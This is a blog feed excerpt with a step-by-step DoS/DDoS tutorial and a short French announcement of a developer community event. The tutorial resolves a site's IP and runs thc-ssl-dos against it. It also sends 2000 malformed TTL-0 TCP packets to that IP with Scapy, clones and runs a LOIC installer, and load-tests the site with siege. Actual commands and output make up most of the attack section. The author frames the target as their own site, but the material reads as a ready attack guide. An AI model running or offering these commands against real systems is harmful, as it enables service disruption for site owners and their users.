&lt;p&gt;&lt;strong&gt;DOS/DDOS categories&lt;/strong&gt;&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;Session abuse.&lt;/li&gt;
&lt;li&gt;Attacks based on packet volume.&lt;/li&gt;
&lt;li&gt;Protocol-based attacks.&lt;/li&gt;
&lt;li&gt;Attacks based on the application layer.&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;&lt;strong&gt;The tools we are going to use&lt;/strong&gt;&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;Low Orbit Ion Cannon&lt;/li&gt;
&lt;li&gt;THC SSL DOS&lt;/li&gt;
&lt;li&gt;Scapy&lt;/li&gt;
&lt;li&gt;Slowloris&lt;/li&gt;
&lt;li&gt;
&lt;a href="https://upordown.ultrawebhosting.com/" rel="noopener noreferrer"&gt;https://upordown.ultrawebhosting.com/&lt;/a&gt;
&lt;strong&gt;let's try it&lt;/strong&gt;
&lt;em&gt;1st tool is a website : &lt;a href="https://upordown.ultrawebhosting.com/" rel="noopener noreferrer"&gt;https://upordown.ultrawebhosting.com/&lt;/a&gt;&lt;/em&gt;
&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fekye04c7t7buqznbfg0i.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fekye04c7t7buqznbfg0i.png" alt=" " width="800" height="334"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;I will check if my site is available or not following service denial attacks. &lt;a href="https://samglishinc.000webhostapp.com" rel="noopener noreferrer"&gt;https://samglishinc.000webhostapp.com&lt;/a&gt;&lt;br&gt;
&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fzag9fyfvaaf69wo0eefy.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fzag9fyfvaaf69wo0eefy.png" alt=" " width="800" height="328"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;we see that the website is available.&lt;br&gt;
&lt;strong&gt;THC SSL DOS&lt;/strong&gt;&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;thc-ssl-dos 
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;





&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt; ______________ ___  _________
     \__    ___/   |   \ \_   ___ \
       |    | /    ~    \/    \  \/
       |    | \    Y    /\     \____
       |____|  \___|_  /  \______  /
                     \/          \/
            http://www.thc.org

          Twitter @hackerschoice

Greetingz: the french underground

./thc-ssl-dos [options] &amp;lt;ip&amp;gt; &amp;lt;port&amp;gt;
  -h      help
  -l &amp;lt;n&amp;gt;  Limit parallel connections [default: 400]
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;how to use : thc-ssl-dos ip_target --accept&lt;/p&gt;

&lt;p&gt;i want to test my website: let's see ip adress&lt;/p&gt;

&lt;p&gt;run this command&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;dmitry samglishinc.000webhostapp.com
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;Output&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;Deepmagic Information Gathering Tool
"There be some deep magic going on"

HostIP:145.14.145.210
HostName:samglishinc.000webhostapp.com

Gathered Inet-whois information for 145.14.145.210
---------------------------------
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;





&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;thc-ssl-dos 145.14.145.210 &lt;span class="nt"&gt;--accept&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;Output&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;Waiting &lt;span class="k"&gt;for &lt;/span&gt;script kiddies to piss off................
The force is with those &lt;span class="nb"&gt;who read &lt;/span&gt;the source...
Handshakes 0 &lt;span class="o"&gt;[&lt;/span&gt;0.00 h/s], 1 Conn, 0 Err
Handshakes 4[4.310 h/s], 2 Conn, 0 Err
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;h1&gt;
  
  
  Scapy
&lt;/h1&gt;



&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;scapy
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;Output&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;INFO: Can&lt;span class="s1"&gt;'t import PyX. Won'&lt;/span&gt;t be able to use psdump&lt;span class="o"&gt;()&lt;/span&gt; or pdfdump&lt;span class="o"&gt;()&lt;/span&gt;&lt;span class="nb"&gt;.&lt;/span&gt;

                     aSPY//YASa       
             apyyyyCY//////////YCa       |
            sY//////YSpcs  scpCY//Pp     | Welcome to Scapy
 ayp ayyyyyyySCP//Pp           syY//C    | Version 2.4.4
 AYAsAYYYYYYYY///Ps              cY//S   |
         pCCCCY//p          cSSps y//Y   | https://github.com/secdev/scapy
         SPPPP///a          pP///AC//Y   |
              A//A            cyP////C   | Have fun!
              p///Ac            sC///a   |
              P////YCpc           A//A   | Craft packets like I craft my beer.
       scccccp///pSP///p          p//Y   |               &lt;span class="nt"&gt;--&lt;/span&gt; Jean De Clerck
      sY/////////y  caa           S//P   |
       cayCyayP//Ya              pY/Ya
        sY/PsY////YCc          aC//Yp 
         sc  sccaCY//PCypaapyCP//YSs  
                  spCPY//////YPSps    
                       ccaacs         
                                       using IPython 8.18.1
&lt;span class="o"&gt;&amp;gt;&amp;gt;&amp;gt;&lt;/span&gt; 
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;We will send a packet with a TTL 0, it is a malformed packet which will create confusion for the target server then a service denial we will send millions of requests.&lt;/p&gt;

&lt;p&gt;Format &lt;code&gt;end(dst="ip", ttl=0)/TCP(),iface="",count=2000)&lt;/code&gt;    &lt;/p&gt;

&lt;p&gt;see your ip_adress and nerwork interface&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;ifconfig
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;&lt;code&gt;adresse cible&lt;/code&gt; : &lt;br&gt;
&lt;code&gt;malformed packet&lt;/code&gt; : use TTL 0&lt;br&gt;
&lt;code&gt;packet volume&lt;/code&gt;: 2000&lt;br&gt;
&lt;code&gt;interface&lt;/code&gt; : wlo1&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;INFO: Can&lt;span class="s1"&gt;'t import PyX. Won'&lt;/span&gt;t be able to use psdump&lt;span class="o"&gt;()&lt;/span&gt; or pdfdump&lt;span class="o"&gt;()&lt;/span&gt;&lt;span class="nb"&gt;.&lt;/span&gt;

                     aSPY//YASa       
             apyyyyCY//////////YCa       |
            sY//////YSpcs  scpCY//Pp     | Welcome to Scapy
 ayp ayyyyyyySCP//Pp           syY//C    | Version 2.4.4
 AYAsAYYYYYYYY///Ps              cY//S   |
         pCCCCY//p          cSSps y//Y   | https://github.com/secdev/scapy
         SPPPP///a          pP///AC//Y   |
              A//A            cyP////C   | Have fun!
              p///Ac            sC///a   |
              P////YCpc           A//A   | Craft packets like I craft my beer.
       scccccp///pSP///p          p//Y   |               &lt;span class="nt"&gt;--&lt;/span&gt; Jean De Clerck
      sY/////////y  caa           S//P   |
       cayCyayP//Ya              pY/Ya
        sY/PsY////YCc          aC//Yp 
         sc  sccaCY//PCypaapyCP//YSs  
                  spCPY//////YPSps    
                       ccaacs         
                                       using IPython 8.18.1
&lt;span class="o"&gt;&amp;gt;&amp;gt;&amp;gt;&lt;/span&gt;send&lt;span class="o"&gt;(&lt;/span&gt;IP&lt;span class="o"&gt;(&lt;/span&gt;&lt;span class="nv"&gt;dst&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="s2"&gt;"145.14.145.210"&lt;/span&gt;, &lt;span class="nv"&gt;ttl&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;0&lt;span class="o"&gt;)&lt;/span&gt;/TCP&lt;span class="o"&gt;()&lt;/span&gt;,iface&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="s2"&gt;"wlo1"&lt;/span&gt;,count&lt;span class="o"&gt;=&lt;/span&gt;2000&lt;span class="o"&gt;)&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;





&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
Sent 2000 packets.
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;for more information visit: &lt;a href="http://sdz.tdct.org/sdz/manipulez-les-paquets-reseau-avec-scapy.html" rel="noopener noreferrer"&gt;http://sdz.tdct.org/sdz/manipulez-les-paquets-reseau-avec-scapy.html&lt;/a&gt;&lt;/p&gt;

&lt;h1&gt;
  
  
  Low Orbit Ion Cannon (LOIC)
&lt;/h1&gt;

&lt;p&gt;Install LOIC&lt;/p&gt;

&lt;p&gt;create folder &lt;code&gt;Loic&lt;/code&gt;&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;mkdir Loic
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;





&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;cd Loic/
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;





&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;git clone https://github.com/nicolargo/loicinstaller.git
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;





&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;cd loicinstaller/
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;





&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;./loic.sh
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;Usage: ./loic.sh &lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;./loic.sh install
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;run&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;./loic.sh run
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fdlm6lya33gasm4yro9bt.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fdlm6lya33gasm4yro9bt.png" alt=" " width="800" height="367"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Ft4mudoxvui2kkdql7zbs.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Ft4mudoxvui2kkdql7zbs.png" alt=" " width="800" height="366"&gt;&lt;/a&gt;&lt;br&gt;
Output&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;New configuration template added to /home/samglish/.siege
Run siege -C to view the current settings in that file
SIEGE 4.0.7
Usage: siege [options]
       siege [options] URL
       siege -g URL
Options:
  -V, --version             VERSION, prints the version number.
  -h, --help                HELP, prints this section.
  -C, --config              CONFIGURATION, show the current config.
  -v, --verbose             VERBOSE, prints notification to screen.
  -q, --quiet               QUIET turns verbose off and suppresses output.
  -g, --get                 GET, pull down HTTP headers and display the
                            transaction. Great for application debugging.
  -p, --print               PRINT, like GET only it prints the entire page.
  -c, --concurrent=NUM      CONCURRENT users, default is 10
  -r, --reps=NUM            REPS, number of times to run the test.
  -t, --time=NUMm           TIMED testing where "m" is modifier S, M, or H
                            ex: --time=1H, one hour test.
  -d, --delay=NUM           Time DELAY, random delay before each request
  -b, --benchmark           BENCHMARK: no delays between requests.
  -i, --internet            INTERNET user simulation, hits URLs randomly.
  -f, --file=FILE           FILE, select a specific URLS FILE.
  -R, --rc=FILE             RC, specify an siegerc file
  -l, --log[=FILE]          LOG to FILE. If FILE is not specified, the
                            default is used: /var/log/siege.log
  -m, --mark="text"         MARK, mark the log file with a string.
                            between .001 and NUM. (NOT COUNTED IN STATS)
  -H, --header="text"       Add a header to request (can be many)
  -A, --user-agent="text"   Sets User-Agent in request
  -T, --content-type="text" Sets Content-Type in request
  -j, --json-output         JSON OUTPUT, print final stats to stdout as JSON
      --no-parser           NO PARSER, turn off the HTML page parser
      --no-follow           NO FOLLOW, do not follow HTTP redirects

Copyright (C) 2018 by Jeffrey Fulmer, et al.
This is free software; see the source for copying conditions.
There is NO warranty; not even for MERCHANTABILITY or FITNESS
FOR A PARTICULAR PURPOSE.
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;





&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;siege samglishinc.000webhostapp.com
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;





&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;{   "transactions":                 9842,
    "availability":                99.93,
    "elapsed_time":               442.90,
    "data_transferred":             9.92,
    "response_time":                1.06,
    "transaction_rate":            22.22,
    "throughput":                   0.02,
    "concurrency":                 23.49,
    "successful_transactions":          7646,
    "failed_transactions":                 7,
    "longest_transaction":             38.89,
    "shortest_transaction":             0.35
}
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



</description>
      <category>cybersecurity</category>
      <category>ddos</category>
    </item>
    <item>
      <title>GNDC (Grand Nord Developers Community)</title>
      <dc:creator>BEIDI DINA SAMUEL</dc:creator>
      <pubDate>Thu, 20 Jun 2024 10:30:11 +0000</pubDate>
      <link>https://forem.com/samglish/gndc-grand-nord-developers-community-4fn3</link>
      <guid>https://forem.com/samglish/gndc-grand-nord-developers-community-4fn3</guid>
      <description>&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F4t7lqeb61sxxcs8gl2k8.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F4t7lqeb61sxxcs8gl2k8.png" alt=" " width="800" height="875"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;Nous sommes heureux de vous annoncer Djabbama Code, un événement exceptionnel organisé par la Grand Nord Developers Community (GNDC) ! Rejoignez-nous le 23 juin de 14h à 17h pour une après-midi dédiée aux technologies de développement d'applications.&lt;/p&gt;

&lt;p&gt;📅 Date : 23 juin 2024&lt;br&gt;
🕒 Heure : 14h - 17h&lt;br&gt;
📍 Lieu : En ligne &lt;/p&gt;

&lt;p&gt;Qu'est-ce que Djabbama Code ?&lt;br&gt;
Djabama Code est une plateforme unique où des experts partageront leurs connaissances sur le développement d'applications mobiles, web et desktop, le design graphique, l'infographie, le multimédia et bien plus encore. Chaque domaine sera couvert par deux speakers qui présenteront des technologies spécifiques avec des démonstrations pratiques et des défis interactifs.&lt;/p&gt;

&lt;p&gt;Pourquoi participer ?&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;Découvrez les dernières technologies de développement&lt;/li&gt;
&lt;li&gt;Apprenez des expériences de professionnels expérimentés&lt;/li&gt;
&lt;li&gt;Participez à des démonstrations et des défis passionnants&lt;/li&gt;
&lt;li&gt;Réseautez avec d'autres développeurs et passionnés de technologie&lt;/li&gt;
&lt;/ul&gt;

</description>
      <category>grandnorddeveloperscommunity</category>
      <category>developers</category>
      <category>beididinasamuel</category>
    </item>
  </channel>
</rss>
